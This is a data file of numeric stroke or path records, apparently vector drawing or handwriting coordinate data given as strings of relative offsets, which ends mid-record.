0,1 0 0,-1 1 0,0-1 0,-1-1 0,-1 0 30,-1-1 0,0 1 0,0 1 0,0-1 0,0 0 0,0 1 0,0 0 0,0 0 1,-1 0-1,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,-1 1 0,1 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 1 0,0 0 0,1 0 0,-6 3 0,-6 3 104,1 0-1,0 1 0,0 0 1,1 1-1,1 1 0,-1 0 1,2 1-1,-20 23 0,31-33-144,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,0-1-1,-1 1 1,1 0 0,0 0 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0-1 0,1 1 0,-1-1-1,0 1 1,1-1 0,0 0 0,-1 0 0,1 1 0,0-1-1,2 1 1,8 5 10,0 0 0,0-1-1,22 8 1,-33-14-20,29 12-88,-15-6-186,1 0-1,1 0 1,-1-2 0,25 5-1,-34-9-297,-1 0-1,0 0 1,1 0-1,-1-1 1,0 0-1,8-2 1,-6 1-806,-1-1 0,0 0-1,0 0 1,0-1 0,12-8 0,10-5-2094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19 792,'0'-3'553,"-1"-9"5716,1 11-6200,0 1 0,0 0 0,0 0 0,0 0-1,0-1 1,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 0,0-1-1,0 1 1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0-1,1-1 1,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0-1,0 0 1,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,-34 15 2576,23-12-2075,1 1 0,0 0 0,1 1 0,-16 10 0,10-3-61,5-6-339,1 1-1,-1 0 1,1 1 0,1 0-1,-1 0 1,2 1-1,-11 15 1,17-22-153,0-1-1,0 0 1,0 1-1,1-1 1,-1 1-1,1-1 1,-1 1-1,1 0 1,0-1-1,0 1 1,0-1 0,0 1-1,1-1 1,-1 1-1,1-1 1,-1 1-1,1-1 1,0 1-1,0-1 1,0 1-1,0-1 1,1 0-1,-1 0 1,0 0 0,1 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0-1-1,1 0 1,-1 1 0,0-1-1,1 0 1,-1-1-1,1 1 1,-1 0-1,1 0 1,-1-1-1,1 0 1,-1 1-1,1-1 1,-1 0 0,5-1-1,20 0-433,-1-2 1,0-1-1,0 0 1,0-2-1,48-18 1,-63 19-1499,1-1 1,-1 0 0,-1-1 0,1 0 0,-1 0 0,11-11 0,-8 1-1215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1 768,'0'0'70,"1"0"0,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,0 1 0,1-1 0,-1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,1 1 0,-1-1 0,0 0-1,0 0 1,0 0 0,0 1 0,0-1 0,1 0 0,-1 0-1,0 0 1,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 1 0,-1-1 0,1 0 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0 0,-1 0-1,1 0 1,0 1 0,0-1 0,-1 0 0,-4 22 2215,-6 26 200,11 112 1536,0 78-2534,11-206-1587,-18-26-3918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1748,'0'0'2777,"32"-6"2332,-16 5-3663,0-1 0,0 0-1,16-5 1,-16 3-844,1 1 1,-1 0-1,19 0 1,-18 3-447,-11-1-141,0 1 1,0-1-1,0 1 0,0 1 1,0-1-1,0 1 0,0 0 1,0 0-1,7 4 0,24 6-2176,2-10-4723,-28-1 4186,-1 0-839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7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10 139 96,'0'-2'11875,"0"3"-12196,0-1 466,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1-1,0 0 1,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,4 2 1248,-1-1-1374,-2 3-14,0 300 941,-6-291-936,6-13-9,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1 1,0-1-1,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 1 1,0-1-1,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 1 1,0-1-1,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 1,1 0-1,-1 0 0,0 0 0,1 0 0,1-119 1028,-2 114-1024,0-4 3,0 0 0,0 0 0,1 0 0,0 0 0,1 0 0,3-13 1,-1 0-4,5-9-9,4-2 1,6-8 26,13-20 53,-26 54-81,0 0 1,0 1 0,1-1-1,-1 1 1,1 0-1,1 1 1,-1-1-1,1 1 1,0 1-1,0 0 1,0 0-1,1 0 1,-1 1-1,1 1 1,0-1-1,10 0 1,-13 3-4,1 0 0,0 1 0,-1 0 0,1 0 0,-1 1 0,0 0 0,1 0 0,-1 0 0,0 1 0,0 0 0,0 0 0,-1 1 0,11 7 0,-16-10 8,1 0 0,-1 0 0,1-1 0,0 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 1,1 0-1,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1-1 1,0 1-1,1 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 2 0,-32 26-23,26-23 12,-13 8-27,0-1 0,0-1 1,-1-1-1,-1-1 0,0 0 0,0-2 1,-36 8-1,27-6 42,10-2-33,7-3-2992,4-2-2510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46 1428,'-3'-1'423,"1"1"-1,-1 0 0,0 0 1,1 0-1,-1 0 0,0 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1 0 1,-1 0-1,1 0 0,0 0 1,-4 3-1,4-2-315,1 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1 0,0 0 0,1-1 0,0 1-1,-1 0 1,1 0 0,0-1 0,1 6 0,-1-6-68,1-1 1,-1 0-1,1 1 1,-1-1-1,1 1 1,0-1-1,-1 0 1,1 0-1,0 1 1,0-1-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,3 1-1,29 16 933,-21-12-609,-10-5-280,0-1-1,1 1 1,-1 0-1,1-1 0,-1 1 1,0-1-1,1 0 0,-1 1 1,1-1-1,-1 0 1,1-1-1,-1 1 0,1 0 1,-1-1-1,1 1 0,-1-1 1,0 0-1,5-2 0,38-23 966,-32 17-861,-12 8-142,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 1 1,1-1-1,-1 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 0 0,-1-3 0,0 4-21,1 1-3,-1 0-1,1-1 1,-1 1 0,0 0-1,1-1 1,-1 1-1,1 0 1,0-1 0,-1 1-1,1-1 1,-1 1 0,1-1-1,0 1 1,-1-1 0,1 1-1,0-1 1,-1 1 0,1-1-1,0 1 1,0-1 0,0 0-1,0 1 1,-1-1 0,1 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0 0 0,1 1-1,-1-1 1,0 1 0,0-1-1,0 0 1,-41-41 917,39 41-905,0 0 1,-1 0 0,1 0-1,0 0 1,-1 1-1,1-1 1,-1 1-1,1-1 1,-1 1 0,-4 0-1,-16-5 336,21 4-337,0 1-1,1-1 1,-1 1 0,0-1-1,0 1 1,0 0 0,0-1 0,0 1-1,0 0 1,-1 0 0,1 1-1,0-1 1,-2 1 0,-9 0 93,11-1 133,0 1-255,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 0,0 1 1,0-1-1,0 1 0,1 0 1,-1-1-1,0 1 0,1 0 1,-2 2-1,-2 3 10,5-7-14,0 1 0,-1-1 1,1 0-1,0 0 0,-1 0 1,1 1-1,0-1 0,-1 0 0,1 0 1,0 1-1,-1-1 0,1 0 1,0 1-1,0-1 0,-1 0 0,1 1 1,0-1-1,0 0 0,0 1 1,0-1-1,-1 0 0,1 1 0,0-1 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,0 0 1,-3 2-7,2-2 7,1-1-1,-1 0 1,1 1-1,-1-1 1,1 1-1,-1-1 1,1 1-1,-1-1 1,1 1-1,-1-1 1,1 1-1,0-1 1,-1 1 0,1 0-1,0-1 1,0 1-1,0-1 1,-1 1-1,1 0 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,0-1-1,0 1 1,0 0 0,0-1-1,1 1 1,-1 0-1,0-1 1,0 1-1,1 0 1,-1-1-1,0 1 1,1-1-1,-1 1 1,0-1-1,1 1 1,-1-1-1,1 1 1,-1-1 0,1 1-1,-1-1 1,1 1-1,-1-1 1,1 0-1,0 1 1,5 11-21,-6-11 17,0 0 1,0-1-1,0 1 1,0-1-1,0 1 1,1 0-1,-1-1 1,0 1-1,0-1 0,1 1 1,-1-1-1,0 1 1,1-1-1,-1 1 1,0-1-1,1 1 1,-1-1-1,1 1 1,-1-1-1,1 0 1,-1 1-1,1-1 0,-1 0 1,2 1-1,1 3-367,7 8-1185,-9-12 1459,-1 0-1,0 0 1,0 0-1,0 0 1,0 1-1,0-1 1,1 0-1,-1 0 1,0 0-1,0 0 0,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1-1 1,0 1-1,0 0 1,0 0-1,0 0 1,0 0-1,1 0 0,-1 0 1,0-1-1,0 1 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,1 0 1,-1 0-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,-1 0 1,1 0-1,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,9-10-6186,-8 5 3219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36 888,'0'0'107,"1"0"1,0 0-1,-1-1 0,1 1 1,-1 0-1,1-1 0,-1 1 1,1-1-1,0 1 1,-1-1-1,0 1 0,1-1 1,-1 1-1,1-1 0,-1 1 1,1-1-1,-1 1 0,0-1 1,0 0-1,1 1 0,-1-1 1,0 1-1,0-1 0,0 0 1,0 1-1,1-1 0,-1 0 1,0 0-1,0 1 0,-1-2 1,5-3 822,3-8 2872,-10 19-2154,2-5-1293,0-1 0,1 1 1,-1 0-1,1-1 0,-1 1 0,1 0 1,-1-1-1,1 1 0,-1 0 1,1 0-1,0 0 0,-1 0 1,1-1-1,0 1 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 1 1,11 58 72,0-29-334,-1-9 61,-9-21-140,1 1 0,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 1,0 0-1,0 4 0,2-1-9,-2-4-10,-1 0 1,1-1 0,0 1-1,-1 0 1,1 0 0,-1-1-1,1 1 1,-1 0 0,1 0-1,-1 0 1,0 0 0,1 0-1,-1-1 1,0 1-1,0 0 1,0 0 0,0 0-1,0 2 1,1 11-572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1 244,'0'0'6759,"2"18"1697,4-17-8269,0 0 0,0 1 0,-1 0 0,1 0-1,-1 0 1,0 1 0,1 0 0,-1 0 0,0 0-1,0 0 1,-1 1 0,6 5 0,22 14 104,31 14-80,-54-30-276,8 5-552,-17-12 501,0 0-1,0 0 1,1 0 0,-1 0 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 1 0,0-1-1,0 0 1,1 0 0,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0-1,0 0 1,1-1 0,-1 1 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0 0,0 0-1,0 0 1,0 0 0,1-1 0,-1 1-1,0 0 1,0 0 0,0 0 0,0 0-1,1-1 1,-1 1 0,0 0 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,1 0 0,-1 0-1,0-1 1,0 1 0,0 0 0,0 0 0,0 0-1,-1-1 1,1 1 0,0 0 0,0-1-1,0-2-2569,0 2 2467,0 0 1,0 0-1,0 1 1,0-1-1,0 0 0,1 0 1,-1 1-1,0-1 1,0 0-1,1 0 1,-1 1-1,0-1 1,1 0-1,-1 1 0,1-1 1,-1 1-1,1-1 1,-1 0-1,1 1 1,-1-1-1,2 0 1,-1 0-582,1-10-1384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25 532,'1'-2'258,"0"1"0,0-1 0,0 1 1,0-1-1,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 1 1,1-1-1,-1 0 0,4-1 0,-5 2-154,0-1 1,1 1-1,-1-1 1,1 1-1,-1 0 0,1 0 1,-1-1-1,0 1 1,1 0-1,-1 0 1,1-1-1,-1 1 1,1 0-1,-1 0 0,1 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 1 0,-1-1 1,1 0-1,-1 0 1,1 1-1,-1-1 1,1 0-1,-1 1 1,0-1-1,1 0 0,-1 1 1,0-1-1,1 1 1,-1-1-1,0 0 1,1 1-1,-1-1 0,0 1 1,0-1-1,1 1 1,-1-1-1,0 1 1,0-1-1,0 1 1,0 0-1,-2 5 327,0-1 1,-1 0-1,1 0 1,-1 0-1,0 0 1,-1 0-1,1-1 1,-1 1-1,0-1 0,-6 5 1,-14 19 854,-12 7-442,30-30-728,1 0 0,-1 0 1,1 1-1,0 0 1,-8 10-1,3-1 43,-2 0 1,1-1-1,-2 0 1,-16 14-1,13-13-117,0 2-1,-17 22 1,11-18-85,-1 2-44,9-7 63,13-15 19,-1 0 0,1 0 1,0 0-1,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 1 1,0-1-1,0 1 0,1-1 0,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1 0 0,0-1 0,0 3 1,0-3-192,3 2-1229,-2-3 1386,-1 0 0,0 0-1,0 0 1,0 1 0,0-1-1,0 0 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 1-1,0-1 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0-1 0,0 1-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,1 0-1,-1 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0-1,0 0 1,0-1 0,0 1-1,0 0 1,0 0 0,0 0-1,0-1 1,0 1 0,0 0-1,31-26-10877,-20 15 7825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6 16,'0'0'3013,"10"-6"4772,-38 28-2838,-8 23-3198,3-3-994,-10 30 211,41-67-896,-1 0-1,1 0 1,0 0 0,0 0-1,1 0 1,-1 0-1,0 10 1,-5 14 210,0-11-111,4-13-115,1 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,2 0 0,-2 10 0,-4 10 83,6-24-135,-1 1 0,0-1 0,1 1 0,-1-1 0,1 0 1,-1 1-1,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,1 0 0,3 9-17,1-2 1,6-2 113,21 8-1906,-31-15 1392,-1 0 0,1-1 0,0 1 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1 0 1,1-2-1,20-17-5848,-13 9 4078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55 684,'-11'18'3860,"13"-11"-3578,0-1 0,1 1 0,0-1 1,0 0-1,7 10 0,-4-11-144,0 0-1,1 0 1,-1-1 0,1 0-1,0 0 1,0 0-1,0-1 1,1 0 0,-1-1-1,1 0 1,-1 0 0,1 0-1,0-1 1,-1-1-1,1 1 1,0-1 0,0 0-1,0-1 1,0 0-1,-1 0 1,1 0 0,13-5-1,-13 1-40,0 0-1,0 0 0,-1-1 1,13-11-1,-18 14 57,0 1 1,1-1-1,-1 0 0,0 1 1,-1-1-1,1 0 1,0 0-1,-1 0 0,1 0 1,-1-1-1,0 1 0,0 0 1,0-1-1,-1 1 0,1-5 1,-1 6-4,0 0 1,0 0 0,-1 0-1,1-1 1,-1 1 0,0 0-1,1 1 1,-1-1 0,0 0-1,0 0 1,0 0-1,0 0 1,0 1 0,-1-1-1,1 0 1,0 1 0,-1-1-1,0 1 1,-1-2 0,-2 0 36,0 0 1,0 0 0,0 0-1,0 1 1,0 0 0,-1 0-1,-7-2 1,6 2-161,0 1 0,1 0 0,-1 0 0,0 0 0,0 1 0,0 0 0,0 0 0,0 1 0,0 0 0,0 0 0,0 1 0,1-1 0,-8 4 0,11-3-289,0 1 0,0-1 0,0 1-1,1 0 1,-1 0 0,1-1 0,-1 2-1,-2 4 1,3-4-962,0-1-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,0-1-1,-5 5 1,-3-1-1922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39 1008,'0'5'6621,"-8"8"-5061,7-12-1428,-1 1 1,1-1-1,0 0 0,0 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0 0-1,1-1 0,-1 1 1,1 0-1,-1-1 0,0 4 1,-9 41 1842,9-42-1839,1 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,1 0 0,0 0 0,0 0-1,0 0 1,1-1 0,-1 1 0,1 0 0,0-1-1,4 7 1,-2-7-78,0 0-1,0 0 1,0 0-1,0 0 1,1-1-1,-1 1 1,1-1-1,-1 0 1,1-1-1,0 1 1,5 0-1,0-1-6,-1-1 1,1-1-1,-1 1 0,1-2 0,-1 1 1,1-1-1,-1-1 0,0 1 0,0-2 0,0 1 1,-1-1-1,12-7 0,-18 10-47,1-1 0,-1 1 0,0 0-1,0-1 1,0 0 0,0 1 0,0-1 0,0 0-1,-1 0 1,1 0 0,-1 0 0,1 0 0,-1-1-1,0 1 1,0 0 0,2-4 0,8-25 67,-11 23-11,0 7-35,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1-1,-1-1 1,1 1 0,-1-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0 0 0,-1-2 0,-2-23 505,-8 17-355,11 8-169,-1-1 0,0 1 0,0-1-1,0 1 1,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,-1 1-1,1-1 1,-3 0 0,3 1 14,-1 0 1,1 0-1,0-1 1,0 1-1,0-1 0,-1 0 1,1 1-1,0-1 1,0 0-1,0 0 0,0 0 1,0-1-1,-2-1 0,-4-2 294,7 4-168,0 0-144,1 1 0,0-1 0,0 1-1,0-1 1,0 0 0,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,-1 1 0,1-1 0,0 1-1,-1-1 1,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1-1,-1-1 1,1 1 0,-1 0 0,1-1-1,-1 1 1,1 0 0,-1 0-1,0-1 1,1 1 0,-1 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,-1 0 1,-25 1 55,18 0-48,6-1-11,0 1-1,0-1 1,-1 1-1,1 0 1,0 0-1,0 0 1,0 0-1,0 1 1,0-1-1,0 1 1,-3 2-1,-9 5-4,1-3-6,-6 6-7,0 8 28,19-20-7,0 1-1,0-1 1,0 1 0,1-1 0,-1 1 0,0 0-1,1 0 1,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0-1,1-1 1,-1 1 0,1 0 0,0 0 0,-1 0-1,1 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1 0,1 2-13,-1-1 1,1 1-1,0-1 1,0 1-1,0-1 1,1 1-1,-1-1 1,1 1-1,0-1 1,0 0-1,4 5 1,-5-6-149,0-1 1,0 0 0,-1 0 0,1 0 0,1 1-1,-1-1 1,0 0 0,0 0 0,0-1 0,1 1 0,-1 0-1,0 0 1,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1-1,1-1 1,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0-1,1 0 1,-1 0 0,1-1 0,-1 1 0,1 0-1,-1-1 1,1 1 0,2-2 0,17-10-8941,-10 6 5732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1 332,'10'-1'11009,"-18"16"-9014,7-13-1902,0-1 1,-1 1-1,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 2 0,0 104 1162,11-78-1337,-11-28-154,1-1-1,-1 1 0,1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,3 1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68 104 684,'-5'14'3646,"4"-14"-3614,1 0-1,0 1 1,-1-1 0,1 1-1,0-1 1,0 0 0,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,0-1 0,0 0-1,0 1 1,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 0 0,0 1-1,1-1 1,-1 1 0,0-1-1,0 0 1,0 1 0,1-1-1,-1 0 1,0 1 0,1-1-1,-1 0 1,0 1 0,1-1-1,-1 0 1,0 0 0,1 1-1,-1-1 1,1 0 0,10 31 905,2-13-559,-12-16-348,0 0 0,0 0 0,0 0 1,1-1-1,-1 1 0,0 0 0,1-1 0,-1 1 1,1-1-1,-1 1 0,1-1 0,-1 0 1,1 1-1,0-1 0,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0-1 1,0 0-1,4 1 0,0-1 77,0 1-38,-1-1 0,1 0 0,0-1 0,0 1-1,0-1 1,-1 0 0,1-1 0,0 1 0,-1-1 0,1 0 0,-1-1 0,9-4 0,4-3-36,1-1 0,-1 0 1,-1-1-1,0-1 0,19-20 1,-35 32 45,0-1-1,0 1 1,-1-1 0,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1 0,-1-1-1,0 1 1,0-1 0,0 0 0,0 1-1,0-1 1,0 1 0,0-1 0,-1 0 0,1 1-1,-1-1 1,1 1 0,-1-1 0,-1-2-1,1 1 85,0 1-1,0-1 1,-1 1 0,1-1-1,-1 1 1,0-1-1,1 1 1,-1 0-1,0 0 1,-3-3-1,-14-6 889,14 8-876,1 0-1,-1 0 0,0 0 1,0 1-1,-1 0 1,1 0-1,0 0 1,-1 1-1,1 0 1,-1 0-1,1 0 1,-1 0-1,-6 1 0,-5 2-91,1 1 0,-1 1-1,1 1 1,0 0 0,0 1 0,0 1-1,-28 17 1,37-20-93,0 0 1,1 1-1,0 0 0,0 1 1,0 0-1,1 0 0,-1 0 1,1 0-1,-6 11 0,10-12-374,0 1 0,0-1-1,0 0 1,1 0 0,0 1-1,0-1 1,0 0 0,1 7 0,0 7-6806,-1-13 4014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 1076,'-9'-2'10311,"7"4"-9036,2 0-1041,0 0 1,0 1 0,0-1-1,-1 0 1,1 0-1,-1 0 1,0 1 0,1-1-1,-1 0 1,0 0-1,0 0 1,-2 2-1,-9 33 744,6-28-818,1 1 1,1-1-1,0 0 1,0 1-1,-2 12 1,2-10 38,0 0 0,0 0 1,-9 16-1,6-13-69,2 0 0,-1 1-1,2 0 1,0 0 0,1 0 0,1 0-1,1 0 1,0 1 0,1 21-1,0-28-108,0 1-1,1 0 1,4 20-1,-5-28-31,1-1-1,0 0 1,-1 0 0,1 1 0,0-1 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0-1,1-1 1,0 1 0,-1 0 0,1-1 0,0 1-1,0-1 1,-1 1 0,1-1 0,0 0-1,0 0 1,1 0 0,-1 0 0,2 1-1,7 1-156,-10-3-143,0 1-1,-1-1 1,1 0-1,0 1 1,0-1-1,0 0 1,0 1-1,0-1 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,-1-1 1,1 1-1,0-1 1,0 1-1,0 0 1,-1-1-1,1 0 1,0 1-1,0-1 1,-1 1-1,1-1 1,-1 0-1,1 0 1,0 1-1,-1-1 1,1 0-1,-1 0 1,1 0-1,1-5-3469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11 231 184,'-10'0'3890,"23"1"3763,-5 0-4264,1-9-3497,3-5 151,0 2 0,0-1 1,1 2-1,26-17 0,15-22-5,-50 47-41,-1-1-1,0 1 1,0-1-1,0 0 1,0 0-1,0 0 1,3-5 0,20-19 16,-23 26-14,-1-1-1,1 1 1,-1-1 0,0 1 0,1-1-1,-1 0 1,0 1 0,0-1-1,0-1 1,0 1 0,0 0 0,-1 0-1,3-5 1,5 9 351,-8 0-106,-9 0-206,6-2 105,2 0-119,1 0 0,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,8 2 183,-16-1-115,6 0 141,3-2-119,-1-1-1,1 1 1,0 0-1,-1 0 1,1 0 0,0 1-1,0-1 1,1 0 0,-1 0-1,0 0 1,0 1 0,1-1-1,-1 1 1,1-1-1,2-1 1,-2 3-97,-4 1-58,1-1 41,1 1-1,-1-1 0,1 0 1,-1 0-1,0 1 1,1-1-1,-1 0 1,1 1-1,-1-1 1,1 1-1,0-1 0,-1 0 1,1 1-1,-1-1 1,1 1-1,0-1 1,-1 1-1,1-1 0,0 1 1,0 0-1,-1-1 1,1 1-1,0-1 1,0 1-1,0-1 1,0 1-1,-1 0 0,1-1 1,0 1-1,0 0 1,0-1-1,1 1 1,-1-1-1,0 1 1,0 0-1,0-1 0,1 2 1,-3 7-14,-2-2 36,1 1 0,-1 0 0,1 0 0,1 1 0,0-1 1,-2 13-1,-3 8 103,-14 79 437,19-99-537,0 0-1,1 0 1,0 0 0,1 0 0,0 0-1,2 15 1,0 9-20,-2-33-3,0-1 0,0 1 0,0 0 0,-1 0 0,1-1 0,0 1 1,0 0-1,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1 0 0,1 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 1,0-1-1,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 1,0 0-1,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 1 1,1-1-1,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,-5-6-1656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36 144,'0'-8'13934,"0"-19"-3528,0 27-10335,0 0 1,-1 1 0,1-1 0,0 0 0,0 1-1,-1-1 1,1 0 0,0 1 0,0-1 0,-1 0-1,1 1 1,0-1 0,-1 0 0,1 0 0,0 0-1,-1 1 1,1-1 0,0 0 0,-1 0 0,1 0-1,-1 0 1,1 1 0,0-1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,0 0 0,-1 0-1,1 0 1,-1-1 0,-6 3-5134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2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11 776 268,'0'0'1171,"-1"12"3109,-1-13-4982,-2-2 3462,11 1 3909,-17 3-1700,10-2-4700,1-29 615,19-1-305,-19 28-549,-1 1 1,1-1-1,-1 1 0,1-1 0,0 1 0,0 0 0,0-1 0,1 1 1,-1 0-1,0 0 0,1-1 0,-1 1 0,1 1 0,2-3 0,37-34 260,-4 4-107,-26 22-124,0 2 0,1-1 0,1 1 0,-1 1 0,1 0 0,21-10 0,91-33-23,-121 50-33,216-89-96,-195 82 101,4-1-17,46-24 1,-47 20 24,49-16 1,-46 18-43,27-11-47,48-15-263,-30 20 506,79-8-1,-22 5 130,-86 17-276,-39 4-23,0 0-1,0 0 1,0-1 0,0-1-1,0 1 1,9-4 0,5-2 1,1 2 1,0 0 0,1 2 0,29-2-1,39-5 39,-68 6-24,1 2 0,33 2 0,-33 0 97,0-1 0,33-5-1,57 0 312,-101 5-408,0 0 0,0 0 0,0 1 0,-1 1 0,15 3 0,-13-2 1,0-1 0,0 0 0,28-3 1,69-22 169,-84 